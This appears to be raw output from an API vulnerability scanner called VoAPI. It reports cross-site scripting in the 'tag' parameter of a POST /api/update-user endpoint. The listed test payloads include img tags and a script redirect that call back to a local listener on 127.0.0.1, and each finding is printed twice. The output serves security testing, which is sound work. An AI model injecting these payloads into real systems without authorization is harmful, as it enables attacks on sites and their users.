-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/update-user
Vul API Method: Post
API Vul Param: tag
API Test Payload: <img src='http://127.0.0.1:4444/xss/api/update-userVoAPItag'>

API Vul Type: xss
Vul API Url: /api/update-user
Vul API Method: Post
API Vul Param: tag
API Test Payload: <img src='http://127.0.0.1:4444/xss/api/update-userVoAPItag'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/update-user
Vul API Method: Post
API Vul Param: tag
API Test Payload: <img src='https://127.0.0.1:4445/xss/api/update-userVoAPItag'>

API Vul Type: xss
Vul API Url: /api/update-user
Vul API Method: Post
API Vul Param: tag
API Test Payload: <img src='https://127.0.0.1:4445/xss/api/update-userVoAPItag'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/update-user
Vul API Method: Post
API Vul Param: tag
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/api/update-userVoAPItag'</script>

API Vul Type: xss
Vul API Url: /api/update-user
Vul API Method: Post
API Vul Param: tag
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/api/update-userVoAPItag'</script>

